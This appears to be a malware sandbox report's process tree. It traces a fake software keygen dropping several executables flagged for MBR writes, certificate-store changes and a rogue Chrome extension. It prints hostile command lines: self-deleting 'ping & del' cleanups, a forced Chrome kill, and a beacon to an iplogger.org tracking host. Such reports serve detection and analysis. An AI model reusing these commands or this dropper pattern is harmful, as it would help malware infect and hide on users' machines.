"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4392 /prefetch:8
2⤵
PID:4304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3892 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4648 /prefetch:8
2⤵
PID:4912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:8
2⤵
PID:4968

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
2⤵
PID:5008

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6fa8e7740,0x7ff6fa8e7750,0x7ff6fa8e7760
3⤵
PID:5044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
2⤵
PID:5024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4772 /prefetch:8
2⤵
PID:5080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4700 /prefetch:8
2⤵
PID:4312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4940 /prefetch:8
2⤵
PID:4452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:8
2⤵
PID:4372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:8
2⤵
PID:4500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:8
2⤵
PID:4548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5632 /prefetch:8
2⤵
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5700 /prefetch:8
2⤵
PID:4640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
2⤵
PID:4340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5252 /prefetch:8
2⤵
PID:2204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4716 /prefetch:8
2⤵
PID:4800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6028 /prefetch:8
2⤵
PID:4948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6248 /prefetch:8
2⤵
PID:4908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5828 /prefetch:8
2⤵
PID:4860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:8
2⤵
PID:4984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:8
2⤵
PID:2456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4864 /prefetch:8
2⤵
PID:5116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:8
2⤵
PID:4992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
2⤵
PID:4480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5072 /prefetch:8
2⤵
PID:4332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6340 /prefetch:8
2⤵
PID:4388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5988 /prefetch:8
2⤵
PID:4512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4968 /prefetch:8
2⤵
PID:1408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6604 /prefetch:8
2⤵
PID:4304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6632 /prefetch:8
2⤵
PID:4784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:8
2⤵
PID:4900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8
2⤵
PID:4408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
2⤵
PID:5020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6940 /prefetch:8
2⤵
PID:5032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:8
2⤵
PID:2240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7268 /prefetch:8
2⤵
PID:4940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7424 /prefetch:8
2⤵
PID:4892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7548 /prefetch:1
2⤵
PID:4576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7296 /prefetch:8
2⤵
PID:4568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7704 /prefetch:8
2⤵
PID:4356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7984 /prefetch:8
2⤵
PID:3100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7824 /prefetch:8
2⤵
PID:4428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4888 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:8
2⤵
PID:4872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2004 /prefetch:8
2⤵
PID:5000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1
2⤵
PID:4532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:8
2⤵
PID:4968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2984 /prefetch:1
2⤵
PID:4412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7012 /prefetch:8
2⤵
PID:1604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7596 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5608 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3024 /prefetch:8
2⤵
PID:4440

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3272

C:\Users\Admin\AppData\Local\Temp\Temp2_CYME.CYMGRD.v6.3.R7.keygen.zip\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_CYME.CYMGRD.v6.3.R7.keygen.zip\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:4836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:4264

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4956

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:224

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:4576

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2372

C:\Users\Admin\AppData\Roaming\A9E8.tmp.exe
"C:\Users\Admin\AppData\Roaming\A9E8.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3316

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\A9E8.tmp.exe"
5⤵
PID:312

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:4416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
4⤵
PID:3932

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:1548

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:836

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:4784

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4448

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:1520

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
PID:4816

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4540

C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp1
5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops Chrome extension
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
PID:2948

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:3752

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:1720

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
6⤵
PID:3176

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:2632

C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp1
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
PID:1768

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:1868

C:\Users\Admin\AppData\Roaming\1613221200584.exe
"C:\Users\Admin\AppData\Roaming\1613221200584.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613221200584.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4708

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:4444

C:\Users\Admin\AppData\Roaming\1613221205193.exe
"C:\Users\Admin\AppData\Roaming\1613221205193.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613221205193.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:936

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:2452

C:\Users\Admin\AppData\Roaming\1613221211146.exe
"C:\Users\Admin\AppData\Roaming\1613221211146.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613221211146.txt"
6⤵
- Executes dropped EXE
PID:3824

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
6⤵
- Executes dropped EXE
PID:2452

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:5676

C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
6⤵
PID:5764

C:\Users\Admin\AppData\Local\Temp\is-C7E35.tmp\23E04C4F32EF2158.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C7E35.tmp\23E04C4F32EF2158.tmp" /SL5="$F007A,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
7⤵
PID:5556

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/14Zhe7"
8⤵
PID:5340

C:\Program Files (x86)\HappyNewYear\seed.sfx.exe
"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s1
8⤵
PID:5332

C:\Program Files (x86)\Seed Trade\Seed\seed.exe
"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
9⤵
PID:5704

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
6⤵
PID:5864

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:4736

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
5⤵
PID:4684

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:4644

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 2724
5⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1584

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
4⤵
- Executes dropped EXE
PID:4344

C:\Users\Admin\AppData\Roaming\E309.tmp.exe
"C:\Users\Admin\AppData\Roaming\E309.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4888

C:\Users\Admin\AppData\Roaming\E309.tmp.exe
"C:\Users\Admin\AppData\Roaming\E309.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
5⤵
PID:2220

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
